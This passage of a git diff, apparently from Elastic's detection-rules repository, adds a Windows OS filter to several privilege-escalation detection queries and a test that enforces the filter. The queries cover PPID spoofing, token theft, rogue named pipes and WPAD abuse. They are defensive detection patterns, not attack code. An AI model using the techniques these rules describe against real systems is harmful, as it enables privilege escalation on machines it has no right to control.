b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name != null and ( /* suspicious parent processes */ diff --git a/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml b/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml index ec2e3a120..aace35f0c 100644 --- a/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml +++ b/rules/windows/privilege_escalation_unusual_printspooler_childprocess.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "spoolsv.exe" and (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 40e81d588..b4ec04a47 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "svchost.exe" and /* based on svchost service arguments -s svcname where the service is known to be childless */ diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml index e81d02b11..e6651c5c6 100644 --- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml +++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ type = "eql" query = ''' /* This rule is compatible with Elastic Endpoint only */ -process where event.action == "start" and +process where host.os.type == "windows" and event.action == "start" and /* process creation via seclogon */ process.parent.Ext.real.pid > 0 and diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index 1acf87252..126c6aa25 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -38,7 +38,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.action : "Pipe Created*" and +file where host.os.type == "windows" and event.action : "Pipe Created*" and /* normal sysmon named pipe creation events truncate the pipe keyword */ file.name : "\\*\\Pipe\\*" ''' diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml index 64aefa8f8..c1e78fa86 100644 --- a/rules/windows/privilege_escalation_via_token_theft.toml +++ b/rules/windows/privilege_escalation_via_token_theft.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup, process.Ext.effective_parent.executable" min_stack_version = "8.4.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ type = "eql" query = ''' /* This rule is only compatible with Elastic Endpoint 8.4+ */ -process where event.action == "start" and +process where host.os.type == "windows" and event.action == "start" and /* CreateProcessWithToken and effective parent is a privileged MS native binary used as a target for token theft */ user.id : "S-1-5-18" and diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml index 135cc0bf6..b16daaafa 100644 --- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml +++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -47,7 +47,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"service-installed" and (winlog.event_data.ClientProcessId:"0" or winlog.event_data.ParentProcessId:"0") +event.action:"service-installed" and host.os.type:windows and + (winlog.event_data.ClientProcessId:"0" or winlog.event_data.ParentProcessId:"0") ''' diff --git a/rules/windows/privilege_escalation_wpad_exploitation.toml b/rules/windows/privilege_escalation_wpad_exploitation.toml index b514c4c8a..453016e47 100644 --- a/rules/windows/privilege_escalation_wpad_exploitation.toml +++ b/rules/windows/privilege_escalation_wpad_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "development" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,15 +27,15 @@ query = ''' /* didn't trigger successfully during testing */ sequence with maxspan=5s - [process where event.type == "start" and process.name : "svchost.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "svchost.exe" and user.domain : "NT AUTHORITY" and user.name : "LOCAL SERVICE"] by process.entity_id - [network where network.protocol : "dns" and process.name : "svchost.exe" and + [network where host.os.type == "windows" and network.protocol : "dns" and process.name : "svchost.exe" and dns.question.name : "wpad" and process.name : "svchost.exe"] by process.entity_id - [network where process.name : "svchost.exe" + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("outgoing", "egress") and destination.port == 80] by process.entity_id - [library where event.type : "start" and process.name : "svchost.exe" and + [library where host.os.type == "windows" and event.type : "start" and process.name : "svchost.exe" and dll.name : "jscript.dll" and process.name : "svchost.exe"] by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "svchost.exe"] by process.parent.entity_id ''' diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py index dce79774b..995d8cc74 100644 --- a/tests/test_all_rules.py +++ b/tests/test_all_rules.py @@ -11,6 +11,7 @@ import warnings from collections import defaultdict from pathlib import Path +import eql.ast from semver import Version import kql @@ -814,3 +815,27 @@ class TestOsqueryPluginNote(BaseRuleTest): if osquery_note_pattern not in rule.contents.data.note: self.fail(f'{self.rule_str(rule)} Investigation guides using the Osquery Markdown must contain ' f'the following note:\n{osquery_note_pattern}') + + +class TestEndpointQuery(BaseRuleTest): + """Test endpoint-specific rules.""" + + def test_os_and_platform_in_query(self): + """Test that all endpoint rules have an os defined and linux includes platform.""" + for rule in self.production_rules: + if not rule.contents.data.get('language') in ('eql', 'kuery'): + continue + if rule.path.parent.name not in ('windows', 'macos', 'linux'): + # skip cross-platform for now + continue + + ast = rule.contents.data.ast + fields = [str(f) for f in ast if isinstance(f, (kql.ast.Field, eql.ast.Field))] + + err_msg = f'{self.rule_str(rule)} missing required field for endpoint rule' + self.assertIn('host.os.type', fields, err_msg) + + # going to bypass this for now + # if rule.path.parent.name == 'linux': + # err_msg = f'{self.rule_str(rule)} missing required field for linux endpoint rule' + # self.assertIn('host.os.platform', fields, err_msg)